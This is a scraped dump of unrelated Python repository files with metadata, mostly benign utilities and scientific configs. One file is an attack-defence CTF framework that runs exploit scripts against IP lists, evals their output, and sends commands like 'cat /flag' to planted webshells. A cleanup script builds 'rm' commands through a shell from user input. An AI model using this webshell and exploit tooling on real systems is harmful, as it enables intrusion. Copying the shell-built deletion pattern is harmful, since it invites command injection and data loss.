self.progress.setMaximum(100)
self.progress.move(10, 10)
self.progress.setStyleSheet("QProgressBar { text-align: center; } ")
self.show()
self.calc = External()
self.calc.countChanged.connect(self.onCountChanged)
self.calc.start()
def onCountChanged(self, value):
self.progress.setValue(value)
if value == 100:
self.close()
if __name__ == "__main__":
app = QApplication(sys.argv)
window = Actions()
sys.exit(app.exec_())
| [
"ga.seunghan@iset-da.com"
] | ga.seunghan@iset-da.com |
71f9e62bbb3f01f87d8d51c517e350f8129ab20b | 7ee95e82bf001151761760adee6c8daafdd0f53d | /main.py | 3d3d4a4c6da2d672c98e1f68d568a7419d0126ad | [] | no_license | mjohnson518/ndc-api | 934f90612802396fe66dd0bb75fbaa1a53f4239b | a45f6661f2007abaffde422eb1e4b525f09473f5 | refs/heads/master | 2023-03-17T18:49:02.267594 | 2021-03-03T15:40:42 | 2021-03-03T15:40:42 | 299,637,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56 | py | from config.wsgi import application
app = application
| [
"marcjohnson518@gmail.com"
] | marcjohnson518@gmail.com |
18d2490212c96c729ab2d95a3c7d7a6c16515918 | 8ef64c761140d0d0c0a05b9252a378417677b47f | /release-cleaner.py | 938fc5d3b43daf5459478cc9428c2c624e1750b3 | [] | no_license | howaminotme/python-experiments | cfae41edb9cbe38b166847470ac8df3851d6fc51 | 434db77847f32cb011d2e0b666c6abd7d3c748b2 | refs/heads/master | 2021-01-16T18:18:12.554340 | 2014-11-22T18:28:29 | 2014-11-22T18:28:29 | 12,466,538 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | #!/usr/bin/env python
import time
import subprocess
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-t', '--target', type='string', action='append', dest='target', help='Directories to be cleaned, with base number of files to be kept and file expressions to ignore, Format : /home/ec2-user/debtapp/current:10:gz')
(opts, args) = parser.parse_args()
target = opts.target
def clean(x):
#break apart target info
bits = x.split(":")
dir = bits[0]
max_objects = int(bits[1])
ignore_objects = bits[2]
#Count non ignored files in target dir and store the count for evaluation
look_for_stuff = subprocess.Popen(["ls -tr %s | grep -v %s | wc -l" % (dir,ignore_objects)], shell=True, stdout=subprocess.PIPE)
count = int(look_for_stuff.communicate()[0])
#evaluate war count, take action if count exceeds threshold
excess = (count - max_objects)
prun_files = subprocess.call(["cd %s ; ls -tr %s | grep -v %s | head -%s | xargs rm" % (dir,dir,ignore_objects,excess)], shell=True)
#call clean on all targets passed to script
while True:
for i in target:
clean(i)
time.sleep(3600)
| [
"bobby@bobby-ThinkPad-T420.(none)"
] | bobby@bobby-ThinkPad-T420.(none) |
f32d24f9fdb32d8eb2a1eef5c82ae7102d01c864 | cc5f2ee6a5de6faf141f10b1b10717243821a0a5 | /problems/problem 106.py | e9b15f310b5e23ecf09e8a1864e6f1ea2dd3f449 | [] | no_license | alexandrepoulin/ProjectEulerInPython | faf634025c86bc74fc764d315813bf1706e58f63 | 97cb52cdd7508f2db891d1644e3d247814571718 | refs/heads/master | 2020-04-22T11:47:04.594328 | 2019-02-16T00:17:40 | 2019-02-16T00:17:40 | 170,341,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | print("Starting")
import useful
## only need to check subset pairs which have the same number of elements
## there are useful.nChooseK(n,s)*useful.nChooseK(n-s,s)*0.5 such pairs
## for a specific subset, we only need to look at pairs which have interweining elements
## such as (1,3)(2,4)
## number of times this doesn't happend is given by Catalan numbers given by c
## multiply that by the total number of ways to make two subsets of that size
## or useful.nChooseK(n,2*s)
## and you find how many pairs you need to check for a subset size
def c(s):
return useful.nChooseK(2*s,s)/(s+1)
def x(n,s):
return useful.nChooseK(n,s)*useful.nChooseK(n-s,s)*0.5-c(s)*useful.nChooseK(n,2*s)
answer = 0
N= 12
for s in range(2,7):
answer += x(N,s)
print(answer)
| [
"alexpoulice@gmail.com"
] | alexpoulice@gmail.com |
0fb85e28da39a06a15a5bb8f4c3e0c42615285b3 | 90b92cc5ec851ba02eb62ef66faac5124d2b4004 | /lab.py | bd5c434acf8d08ef2e9b00350a7e116972bdc47b | [] | no_license | CodecoolGlobal/first-game-python-404-groupname-not-found | 326b32ad2d30b09f7cdb6fd249d8da75791db8cb | d748b74c8170e070c29b5da91da111c6625621d0 | refs/heads/master | 2020-06-27T19:50:27.309800 | 2019-08-01T23:07:27 | 2019-08-01T23:07:27 | 200,034,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 780 | py | def openmap(file): # Reads the map.txt file and returns it as grid
with open(file, "r") as coords:
map = [[char for char in line] for line in coords]
return map
def printmap(map): # Prints the whole map as a string
oneline = []
for lines in range(len(map)):
oneline.append(''.join(map[lines]))
string = ''.join(oneline)
return string
def victory(): # Reads and returns the "Victory text"
with open("win.txt", "r") as vict:
text = vict.readlines()
return text
def atplace(map, char): # Returns the coordinates of the @ symbol
place = []
for y in range(len(map)):
if char in map[y]:
place.append(y)
place.append(map[y].index(char))
break
return place | [
"krisztian@pometko.hu"
] | krisztian@pometko.hu |
a17b7c155f7613f9593547322fbe5f0fed743010 | 284024e804a5bb4129ebd4f0e835a86144b9fc8c | /const.py | 8d16efbab47fa555252a0da697c9026c26524b16 | [] | no_license | sunnypwang/honk-raid-bot | 1091d15b15bfa27c5aa634b95163b662e0ed85f5 | 3c246f4240770aef52a06242407941c35929d2cd | refs/heads/master | 2020-11-23T18:37:15.262575 | 2020-03-07T16:12:30 | 2020-03-07T16:12:30 | 227,770,974 | 0 | 1 | null | 2020-03-07T16:12:31 | 2019-12-13T06:22:53 | Python | UTF-8 | Python | false | false | 85 | py | import os
BOT_TOKEN = os.environ['BOT_TOKEN']
SHEET_URL = os.environ['SHEET_URL'] | [
"noreply@github.com"
] | noreply@github.com |
8c7259cafebf5ebbaa2fbd3663278c7ee04d2a70 | 57750e1b1bc7a4260480d12c5f4b4d1130de4a39 | /models/order_list.py | 67fa792ea1865d347f1db01ca553e571e74ac284 | [] | no_license | stmccoy/Flask_lab_1 | 3c64da93e209e58196e7524920fa63473d532778 | b69cb5a26c35557c6745464bf9983ba886d719ed | refs/heads/main | 2023-04-01T14:39:14.459435 | 2021-04-14T15:11:59 | 2021-04-14T15:11:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | from models.order import *
order_1 = Order("Fred", "07/04/2021", 5)
order_2 = Order("Sandra", "13/04/2021", 10)
orders = [order_1, order_2] | [
"giulianoderosas@gmail.com"
] | giulianoderosas@gmail.com |
d1c16aaedb8a8c6c729f677384d7b278cec936b3 | c4f746f7f7cdad7a843acf693efd1a0f32ff9460 | /small_train/utils.py | 46c1f83bc04f33e087d29595b12764b36ef03f8a | [] | no_license | jon-wong-sutd/ml-workshop | 1b08ba90d267bf317b630a4cff570c369236da41 | 9d842263744068156a52124f8817ad708259721c | refs/heads/master | 2020-12-14T08:50:50.443241 | 2017-06-29T00:50:44 | 2017-06-29T00:50:44 | 95,509,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,476 | py | from math import sqrt
import tensorflow as tf
def kernel_on_grid(kernel, pad):
def factorization(n):
for i in range(int(sqrt(float(n))), 0, -1):
if n % i == 0:
# if i == 1: print('Who would enter a prime number of filters')
return (i, int(n / i))
(grid_Y, grid_X) = factorization (kernel.get_shape()[3].value)
# print ('grid: %d = (%d, %d)' % (kernel.get_shape()[3].value, grid_Y, grid_X))
x_min = tf.reduce_min(kernel)
x_max = tf.reduce_max(kernel)
# kernel = (kernel - x_min) / (x_max - x_min)
# pad X and Y
x = tf.pad(kernel, tf.constant( [[pad,pad],[pad, pad],[0,0],[0,0]] ), mode = 'CONSTANT')
# X and Y dimensions, w.r.t. padding
Y = kernel.get_shape()[0] + 2 * pad
X = kernel.get_shape()[1] + 2 * pad
channels = kernel.get_shape()[2]
# put NumKernels to the 1st dimension
x = tf.transpose(x, (3, 0, 1, 2))
# organize grid on Y axis
x = tf.reshape(x, tf.stack([grid_X, Y * grid_Y, X, channels]))
# print(x.shape)
# switch X and Y axes
x = tf.transpose(x, (0, 2, 1, 3))
# organize grid on X axis
x = tf.reshape(x, tf.stack([1, X * grid_X, Y * grid_Y, channels]))
# back to normal order (not combining with the next step for clarity)
x = tf.transpose(x, (2, 1, 3, 0))
# to tf.image_summary order [batch_size, height, width, channels],
# where in this case batch_size == 1
x = tf.transpose(x, (3, 0, 1, 2))
# scaling to [0, 255] is not necessary for tensorboard
return x
| [
"jhannwong@gmail.com"
] | jhannwong@gmail.com |
24fe9556ce940ab8806e5db0a44a5d00d39fa360 | f2ff9b13a4fcb9330e59e87d08ef542d6ddba18a | /src/data/tweets2sqlite.py | 251168e3778b696738cdfbdf6bf455e2c7f18861 | [
"MIT"
] | permissive | EmbeddML/peap-analysis | 489732dc2d71a1428372b29fbc18ca620d224c88 | 14eb75cdaa60842dd9b530c10c47985aa77f8ff7 | refs/heads/master | 2023-08-19T09:25:05.260246 | 2021-10-12T20:21:20 | 2021-10-12T20:21:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | import pandas as pd
from sqlalchemy import create_engine
import click
@click.command()
@click.option(
"-t",
"--tweets-file",
"tweets_file",
type=click.Path(dir_okay=False, exists=True, readable=True),
required=True,
)
@click.option(
"-s",
"--sqlite-file",
"sqlite_file",
type=click.Path(dir_okay=False, readable=True),
required=True,
)
@click.option(
"-n",
"--db-name",
"db_name",
type=click.STRING,
default='tweets',
required=True
)
def save_to_sqlite(tweets_file: str, sqlite_file: str, db_name: str):
engine = create_engine(f'sqlite:///{sqlite_file}')
tweets = pd.read_pickle(tweets_file)
tweets.to_sql(db_name, con=engine)
if __name__ == '__main__':
save_to_sqlite() # pylint: disable=no-value-for-parameter
| [
"p.gramacki@gmail.com"
] | p.gramacki@gmail.com |
f2903089615d4356f19532dc60fb14fac9acfb99 | 7a8ba5cc264b58462b8cad88a70297876dbd2876 | /SearchJavMaglink/anls/anlslink.py | a552821d4fa6a72191d6e19ecd2a52a3f479a86b | [
"MIT"
] | permissive | Roger-tn-su/SearchJavMaglink | 6f3e6500f7762e92e102a8ec024b71b8506100a4 | 604e6e4c3ac943dedba16293a8b41f4a8f19c351 | refs/heads/master | 2020-08-03T01:42:10.748016 | 2020-01-15T07:08:43 | 2020-01-15T07:08:43 | 211,579,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,704 | py | #encoding: utf-8
"""
@project = SearchJavMaglink
@file = anlslink
@author = ThinkPad
@create_time = 2019-09-2917:00
"""
import re
import xlrd
import xlwt
def take_size(av_info_elem):
return av_info_elem[3]
# def get_av_info(ax_xls_file, av_info_list):
# jav_workbook = xlrd.open_workbook(ax_xls_file)
# jav_sheet = jav_workbook.sheets()[0]
# for i in range(0, jav_sheet.nrows):
# av_info_list.append(jav_sheet.row(i))
# def anls_mag(mag_info_list[:],valid_mag_list,bak_mag_list):
# while len(mag_info_list):
# anls_slice = mag_info_list[:int(mag_info_list[0][6].value)]
# del mag_info_list[:int(mag_info_list[0][6].value)]
# xls_file = 'jurujuesebanyantest.xls'
# xls_path_file = 'D:/Python/Project/ExcelAccess/SearchJavMaglink/datafile/' + xls_file
# output_file = 'jurutest.xls'
# output_path_file = 'D:/Python/Project/ExcelAccess/SearchJavMaglink/outputfile/' + output_file
# av_mag_info_list = []
# av_valid_mag_list = []
# av_bak_mag_list = []
# av_act_slice = []
# av_act_mag_list = []
def anls_mag(mag_list,first_list,second_list,bak_list,error_list):
legal_pattern = r'(\[.+\..+\])|(【入微】)|(\.mp4$)|(^\#\_)'
illegal_pattern = r'(第一会所)|(第一會所)'
# get_av_info(xls_path_file, av_mag_info_list)
while len(mag_list):
flag = 0
av_slice = mag_list[:int(mag_list[0][6])]
del mag_list[:int(mag_list[0][6])]
av_slice.sort(key=take_size)
for item in av_slice[:]:
av_code_pattern = r'.*' + item[0].split('-', 1)[0] + r'.*' + item[0].split('-', 1)[1] \
+ r'.*'
if re.search(illegal_pattern, item[2], re.IGNORECASE) is not None:
continue
elif re.search(av_code_pattern, item[2], re.IGNORECASE) is not None:
if (re.search(legal_pattern, item[2], re.IGNORECASE) is not None) and \
(flag == 0):
first_list.append(item)
flag = 1
else:
second_list.append(item)
else:
bak_list.append(item)
if flag == 0:
error_list.append(
[av_slice[0][0], av_slice[0][1], 'no matched item'])
# print(len(av_mag_info_list), av_mag_info_list)
# print (len(av_act_mag_list),av_act_mag_list)
# print(len(av_valid_mag_list), av_valid_mag_list)
# print(len(av_bak_mag_list), av_bak_mag_list)
# wt_mag_link(output_path_file, av_act_mag_list, av_valid_mag_list, av_bak_mag_list)
# anls_slice = av_mag_info_list[:int(av_mag_info_list[0][6].value)]
# del av_mag_info_list[:int(av_mag_info_list[0][6].value)]
# anls_slice.sort(key=take_size)
| [
"roger_su@163.com"
] | roger_su@163.com |
8adf0f6e46167b035d5473943b9b2eea97559606 | 709f734cdd3530f8a3ff81c83b08d502946f73e8 | /core/attack.py | e6be5e5fc11e5358018eb189c34314f70a151919 | [] | no_license | ccccm4/awd_framework | fab5e9f337f73518f56c70e1b5501b5818f7f266 | 37c1bb206fb1bc704feadb935dfe35443c765415 | refs/heads/master | 2020-06-22T12:13:20.588116 | 2019-07-19T06:21:52 | 2019-07-19T06:21:52 | 197,713,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,543 | py | # _*_ coding: utf8 _*_
import re
import os
import pickle
import popen2
import requests
flag_pattern = re.compile('flag\{.*\}')
class Attack():
def __init__(self):
try:
with open('data/ip_list.pickle','r') as fp:
self.ip_list = pickle.load(fp)
with open('data/exploits.pickle','r') as fp:
self.exploits = pickle.load(fp)
with open('data/webshell_data.pickle','r') as fp:
self.webshell_data = pickle.load(fp)
with open('data/flag.pickle','r') as fp:
self.flag = pickle.load(fp)
except:
self.ip_list = {}
self.exploits = []
self.webshell_data = {}
self.flag = []
# 设置ip的方法,1.1.x.1 1.1.1.x
def set_ip_1(self,ad_server_name,ip,port,num): # check if ip in the list
self.ip_list[ad_server_name] = []
for i in range(int(num)):
url = 'http://'+ip.replace('x',str(i))+':'+port
self.ip_list[ad_server_name].append(url)
with open('data/ip_list.pickle','wb') as fp:
pickle.dump(self.ip_list,fp)
# 载入exp
def load_exp(self): # feature
for root, dirs, files in os.walk('./exp'):
for i in files:
self.exploits.append(i)
with open('data/exploits.pickle','wb') as fp:
pickle.dump(self.exploits,fp)
# threading ip传参问题
def exploit(self,ad_server_name,exp):
ip = self.ip_list[ad_server_name]
for i in ip:
print i
# cmd = 'dir'
try:
cmd = 'python2 ' + './exp/' + exp.replace('.py','') + '.py ' + str(ip)
fr,fw,fe = popen2.popen3(cmd) # popen3
# print fr.read()
# rce 警告 嘻嘻嘻
tmp = eval(fr.read())
if tmp:
if tmp[0]:
self.flag.append(tmp[0])
if tmp[1]:
self.webshell_data[tmp[1]] = i + str('/.config.php')
# 保存flag 保存webshell_url
fe.close()
fr.close()
fw.close()
except:
print fe.read()
fe.close()
fr.close()
fw.close()
with open('data/webshell_data.pickle','wb') as fp:
pickle.dump(self.webshell_data,fp)
with open('data/flag.pickle','wb') as fp:
pickle.dump(self.flag,fp)
def submit_flag(self):
if self.flag:
# 自己写
pass
def manage_shell(self,cmd,flag='0'):
if self.webshell_data:
for passwd,url in webshell_data:
if flag == '1':
try:
r = requests.post(url=url,data={passwd:'cat /flag'})
f = flag_pattern.findall(r.content)[0]
self.flag.append(f)
except:
print 'miaomiaomiao'
else:
try:
r = requests.post(url=url,data={passwd:cmd})
print r.content
except:
print 'miaomiaomiao'
with open('data/flag.pickle','wb') as fp:
pickle.dump(self.flag,fp)
| [
"noreply@github.com"
] | noreply@github.com |
020ceae132754010f36ebf19881b9db9014ed256 | 3f95c72a6ad383a8c929ccff679d4635223e39e7 | /powheg_2017/ggH_SM.py | a8936c8ca06167fa97c0b336b9201d970b30df1c | [] | no_license | danielwinterbottom/MC_gen | 88d2a7395b276b57433a4d1699c167bba25a7518 | a814a7ed8f1921ee459c7c2f39d8d160e47c13c2 | refs/heads/master | 2020-06-20T17:56:02.320861 | 2019-08-12T08:33:42 | 2019-08-12T08:33:42 | 197,200,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,358 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: Configuration/GenProduction/python/HIG-RunIIFall17wmLHEGS-02619-fragment.py --fileout file:HIG-RunIIFall17wmLHEGS-02619.root --mc --eventcontent RAWSIM,LHE --datatier GEN-SIM,LHE --conditions 93X_mc2017_realistic_v3 --beamspot Realistic25ns13TeVEarly2017Collision --step LHE,GEN,SIM --nThreads 8 --geometry DB:Extended --era Run2_2017 --python_filename HIG-RunIIFall17wmLHEGS-02619_1_cfg.py --no_exec --customise Configuration/DataProcessing/Utils.addMonitoring --customise_commands process.RandomNumberGeneratorService.externalLHEProducer.initialSeed=int(1542798870%100) -n 100
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('SIM',eras.Run2_2017)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.GeometrySimDB_cff')
process.load('Configuration.StandardSequences.MagneticField_cff')
process.load('Configuration.StandardSequences.Generator_cff')
process.load('IOMC.EventVertexGenerators.VtxSmearedRealistic25ns13TeVEarly2017Collision_cfi')
process.load('GeneratorInterface.Core.genFilterSummary_cff')
process.load('Configuration.StandardSequences.SimIdeal_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(100)
)
# Input source
process.source = cms.Source("EmptySource")
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('Configuration/GenProduction/python/HIG-RunIIFall17wmLHEGS-02619-fragment.py nevts:100'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.RAWSIMoutput = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('generation_step')
),
compressionAlgorithm = cms.untracked.string('LZMA'),
compressionLevel = cms.untracked.int32(9),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('GEN-SIM'),
filterName = cms.untracked.string('')
),
eventAutoFlushCompressedSize = cms.untracked.int32(20971520),
fileName = cms.untracked.string('file:HIG-RunIIFall17wmLHEGS-02619.root'),
outputCommands = process.RAWSIMEventContent.outputCommands,
splitLevel = cms.untracked.int32(0)
)
process.LHEoutput = cms.OutputModule("PoolOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('LHE'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:HIG-RunIIFall17wmLHEGS-02619_inLHE.root'),
outputCommands = process.LHEEventContent.outputCommands,
splitLevel = cms.untracked.int32(0)
)
# Additional output definition
# Other statements
process.XMLFromDBSource.label = cms.string("Extended")
process.genstepfilter.triggerConditions=cms.vstring("generation_step")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '93X_mc2017_realistic_v3', '')
process.generator = cms.EDFilter("Pythia8HadronizerFilter",
nAttempts = cms.uint32(1),
HepMCFilter = cms.PSet(
filterName = cms.string('EmbeddingHepMCFilter'),
filterParameters = cms.PSet(
ElElCut = cms.string('El1.Pt > 22 && El2.Pt > 10 && El1.Eta < 2.6 && El2.Eta < 2.6'),
ElHadCut = cms.string('El.Pt > 22 && Had.Pt > 16 && El.Eta < 2.6 && Had.Eta < 2.6'),
ElMuCut = cms.string('Mu.Pt > 9 && El.Pt > 11 && El.Eta < 2.6 && Mu.Eta < 2.5'),
HadHadCut = cms.string('Had1.Pt > 33 && Had2.Pt > 33 && Had1.Eta < 2.2 && Had2.Eta < 2.2'),
MuHadCut = cms.string('Mu.Pt > 19 && Had.Pt > 16 && Mu.Eta < 2.5 && Had.Eta < 2.6'),
MuMuCut = cms.string('Mu1.Pt > 17 && Mu2.Pt > 8 && Mu1.Eta < 2.5 && Mu2.Eta < 2.5'),
Final_States = cms.vstring(
'ElEl',
'ElHad',
'ElMu',
'HadHad',
'MuHad',
'MuMu'
),
BosonPDGID = cms.int32(25)
)
),
PythiaParameters = cms.PSet(
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CP5Settings',
'pythia8PowhegEmissionVetoSettings',
'processParameters'),
processParameters = cms.vstring('POWHEG:nFinal = 1',
'25:onMode = off',
'25:onIfMatch = 15 -15',
'25:m0 = 125.0'),
pythia8CP5Settings = cms.vstring('Tune:pp 14',
'Tune:ee 7',
'MultipartonInteractions:ecmPow=0.03344',
'PDF:pSet=20',
'MultipartonInteractions:bProfile=2',
'MultipartonInteractions:pT0Ref=1.41',
'MultipartonInteractions:coreRadius=0.7634',
'MultipartonInteractions:coreFraction=0.63',
'ColourReconnection:range=5.176',
'SigmaTotal:zeroAXB=off',
'SpaceShower:alphaSorder=2',
'SpaceShower:alphaSvalue=0.118',
'SigmaProcess:alphaSvalue=0.118',
'SigmaProcess:alphaSorder=2',
'MultipartonInteractions:alphaSvalue=0.118',
'MultipartonInteractions:alphaSorder=2',
'TimeShower:alphaSorder=2',
'TimeShower:alphaSvalue=0.118'),
pythia8CommonSettings = cms.vstring('Tune:preferLHAPDF = 2',
'Main:timesAllowErrors = 10000',
'Check:epTolErr = 0.01',
'Beams:setProductionScalesFromLHEF = off',
'SLHA:keepSM = on',
'SLHA:minMassSM = 1000.',
'ParticleDecays:limitTau0 = on',
'ParticleDecays:tau0Max = 10',
'ParticleDecays:allowPhotonRadiation = on'),
pythia8PowhegEmissionVetoSettings = cms.vstring('POWHEG:veto = 1',
'POWHEG:pTdef = 1',
'POWHEG:emitted = 0',
'POWHEG:pTemt = 0',
'POWHEG:pThard = 0',
'POWHEG:vetoCount = 100',
'SpaceShower:pTmaxMatch = 2',
'TimeShower:pTmaxMatch = 2')
),
comEnergy = cms.double(13000.0),
filterEfficiency = cms.untracked.double(1.0),
maxEventsToPrint = cms.untracked.int32(1),
pythiaHepMCVerbosity = cms.untracked.bool(False),
pythiaPylistVerbosity = cms.untracked.int32(1)
)
process.externalLHEProducer = cms.EDProducer("ExternalLHEProducer",
args = cms.vstring('/cvmfs/cms.cern.ch/phys_generator/gridpacks/2017/13TeV/powheg/V2/gg_H_quark-mass-effects_NNPDF31_13TeV_M125/v1/gg_H_quark-mass-effects_NNPDF31_13TeV_M125_slc6_amd64_gcc630_CMSSW_9_3_0.tgz'),
nEvents = cms.untracked.uint32(100),
numberOfParameters = cms.uint32(1),
outputFile = cms.string('cmsgrid_final.lhe'),
scriptName = cms.FileInPath('GeneratorInterface/LHEInterface/data/run_generic_tarball_cvmfs.sh')
)
process.ProductionFilterSequence = cms.Sequence(process.generator)
# Path and EndPath definitions
process.lhe_step = cms.Path(process.externalLHEProducer)
process.generation_step = cms.Path(process.pgen)
process.simulation_step = cms.Path(process.psim)
process.genfiltersummary_step = cms.EndPath(process.genFilterSummary)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.RAWSIMoutput_step = cms.EndPath(process.RAWSIMoutput)
process.LHEoutput_step = cms.EndPath(process.LHEoutput)
# Schedule definition
process.schedule = cms.Schedule(process.lhe_step,process.generation_step,process.genfiltersummary_step,process.simulation_step,process.endjob_step,process.RAWSIMoutput_step)#,process.LHEoutput_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)
#Setup FWK for multithreaded
process.options.numberOfThreads=cms.untracked.uint32(4)
process.options.numberOfStreams=cms.untracked.uint32(0)
# filter all path with the production filter sequence
for path in process.paths:
if path in ['lhe_step']: continue
getattr(process,path)._seq = process.ProductionFilterSequence * getattr(process,path)._seq
# customisation of the process.
# Automatic addition of the customisation function from Configuration.DataProcessing.Utils
from Configuration.DataProcessing.Utils import addMonitoring
#call to customisation function addMonitoring imported from Configuration.DataProcessing.Utils
process = addMonitoring(process)
# End of customisation functions
# Customisation from command line
process.RandomNumberGeneratorService.externalLHEProducer.initialSeed=int(1542798870%100)
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion
| [
"[Email"
] | [Email |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.